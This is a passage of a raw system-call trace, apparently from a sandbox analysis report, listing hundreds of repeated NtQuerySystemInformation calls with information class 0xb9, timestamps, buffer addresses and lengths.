ResultLength=0x0) [0287.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd10, Length=0x38, ResultLength=0x0) [0287.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb90, Length=0x20, ResultLength=0x0) [0287.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb20, Length=0x20, ResultLength=0x0) [0287.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb20, Length=0x20, ResultLength=0x0) [0287.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.418] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdf8, Length=0x58, ResultLength=0x0) [0287.418] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.418] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccd0, Length=0x38, ResultLength=0x0) [0287.420] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.420] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb10, Length=0x28, ResultLength=0x0) [0287.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.424] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.424] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb10, Length=0x28, ResultLength=0x0) [0287.424] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.424] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.424] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb10, Length=0x28, ResultLength=0x0) [0287.424] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.424] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.424] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb10, Length=0x28, ResultLength=0x0) [0287.424] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.424] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.424] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb80, Length=0x28, ResultLength=0x0) [0287.424] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.424] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.424] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccd0, Length=0x38, ResultLength=0x0) [0287.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccd0, Length=0x38, ResultLength=0x0) [0287.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc00, Length=0x28, ResultLength=0x0) [0287.428] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.428] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.428] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.428] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc00, Length=0x28, ResultLength=0x0) [0287.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccd0, Length=0x38, ResultLength=0x0) [0287.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccd0, Length=0x38, ResultLength=0x0) [0287.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca70, Length=0x20, ResultLength=0x0) [0287.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9f0, Length=0x20, ResultLength=0x0) [0287.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9f0, Length=0x20, ResultLength=0x0) [0287.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9f0, Length=0x20, ResultLength=0x0) [0287.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc40, Length=0x20, ResultLength=0x0) [0287.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccd0, Length=0x38, ResultLength=0x0) [0287.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb60, Length=0x20, ResultLength=0x0) [0287.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cae0, Length=0x20, ResultLength=0x0) [0287.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cae0, Length=0x20, ResultLength=0x0) [0287.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cae0, Length=0x20, ResultLength=0x0) [0287.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.434] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.434] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccd0, Length=0x38, ResultLength=0x0) [0287.434] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb60, Length=0x20, ResultLength=0x0) [0287.434] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cae0, Length=0x20, ResultLength=0x0) [0287.434] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.434] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cae0, Length=0x20, ResultLength=0x0) [0287.434] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.435] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cae0, Length=0x20, ResultLength=0x0) [0287.435] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.435] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.435] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.435] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.435] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccd0, Length=0x38, ResultLength=0x0) [0287.436] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb60, Length=0x20, ResultLength=0x0) [0287.436] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207caf0, Length=0x20, ResultLength=0x0) [0287.436] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.436] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.436] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.436] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207caf0, Length=0x20, ResultLength=0x0) [0287.437] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.439] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.439] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.439] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.439] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.439] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdf8, Length=0x58, ResultLength=0x0) [0287.440] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccc0, Length=0x58, ResultLength=0x0) [0287.440] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.440] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbe0, Length=0x38, ResultLength=0x0) [0287.443] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.443] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca10, Length=0x28, ResultLength=0x0) [0287.443] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.443] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.444] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca10, Length=0x28, ResultLength=0x0) [0287.444] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.444] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.444] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca10, Length=0x28, ResultLength=0x0) [0287.444] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.445] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.445] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca10, Length=0x28, ResultLength=0x0) [0287.445] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.445] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.445] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca80, Length=0x28, ResultLength=0x0) [0287.445] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.446] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.446] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbe0, Length=0x38, ResultLength=0x0) [0287.446] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.446] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb00, Length=0x28, ResultLength=0x0) [0287.450] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.451] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.451] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.451] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.451] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.452] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb00, Length=0x28, ResultLength=0x0) [0287.452] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.452] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.452] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbe0, Length=0x38, ResultLength=0x0) [0287.452] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca60, Length=0x20, ResultLength=0x0) [0287.453] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9e0, Length=0x20, ResultLength=0x0) [0287.453] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.453] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9e0, Length=0x20, ResultLength=0x0) [0287.453] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.453] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9e0, Length=0x20, ResultLength=0x0) [0287.453] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.453] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.453] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.454] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.454] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbe0, Length=0x38, ResultLength=0x0) [0287.454] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca60, Length=0x20, ResultLength=0x0) [0287.454] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9f0, Length=0x20, ResultLength=0x0) [0287.454] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.454] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.454] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.455] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9f0, Length=0x20, ResultLength=0x0) [0287.455] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.455] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.455] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.455] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.455] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.455] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccc0, Length=0x58, ResultLength=0x0) [0287.456] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.456] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbe0, Length=0x38, ResultLength=0x0) [0287.460] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.460] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca10, Length=0x28, ResultLength=0x0) [0287.460] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.460] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.460] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca10, Length=0x28, ResultLength=0x0) [0287.461] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.461] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.461] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca10, Length=0x28, ResultLength=0x0) [0287.461] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.461] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.462] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca10, Length=0x28, ResultLength=0x0) [0287.462] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.462] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.462] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca80, Length=0x28, ResultLength=0x0) [0287.462] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.462] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.462] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbe0, Length=0x38, ResultLength=0x0) [0287.463] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.463] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb00, Length=0x28, ResultLength=0x0) [0287.469] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.469] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.469] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.469] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.470] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.470] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb00, Length=0x28, ResultLength=0x0) [0287.470] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9a0, Length=0x20, ResultLength=0x0) [0287.470] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c920, Length=0x20, ResultLength=0x0) [0287.470] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.471] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c920, Length=0x20, ResultLength=0x0) [0287.471] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.471] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c920, Length=0x20, ResultLength=0x0) [0287.471] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.471] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.471] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.471] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.471] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.471] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbe0, Length=0x38, ResultLength=0x0) [0287.471] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.472] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbe0, Length=0x38, ResultLength=0x0) [0287.472] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca60, Length=0x20, ResultLength=0x0) [0287.472] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9f0, Length=0x20, ResultLength=0x0) [0287.472] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.472] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.472] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.472] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9f0, Length=0x20, ResultLength=0x0) [0287.472] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.472] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.472] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.472] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.472] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.473] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccc0, Length=0x58, ResultLength=0x0) [0287.473] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.473] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbe0, Length=0x38, ResultLength=0x0) [0287.475] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.475] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca10, Length=0x28, ResultLength=0x0) [0287.475] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.476] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.476] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca10, Length=0x28, ResultLength=0x0) [0287.476] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.476] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.476] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca10, Length=0x28, ResultLength=0x0) [0287.476] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.476] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.476] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca10, Length=0x28, ResultLength=0x0) [0287.476] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.476] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.477] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca80, Length=0x28, ResultLength=0x0) [0287.477] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.477] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.477] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbe0, Length=0x38, ResultLength=0x0) [0287.477] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.477] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb00, Length=0x28, ResultLength=0x0) [0287.481] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.481] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.481] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.481] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.481] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.482] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb00, Length=0x28, ResultLength=0x0) [0287.482] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.482] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.482] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbe0, Length=0x38, ResultLength=0x0) [0287.482] 